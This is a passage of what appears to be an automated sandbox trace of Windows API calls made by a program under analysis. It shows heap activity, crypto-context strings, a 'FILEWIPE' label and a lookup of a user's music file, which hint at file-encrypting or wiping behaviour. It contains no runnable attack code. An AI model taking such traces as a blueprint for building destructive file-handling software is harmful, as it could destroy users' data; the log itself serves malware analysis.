lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.372] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.372] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.373] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.373] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.373] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.373] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.373] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.375] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.376] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.376] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.377] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.377] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.377] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.377] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.378] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.378] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.378] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.379] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.379] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0xed260310, ftLastWriteTime.dwHighDateTime=0x1d5bd12, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0x7c2240 [0037.379] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.380] RtlAllocateHeap 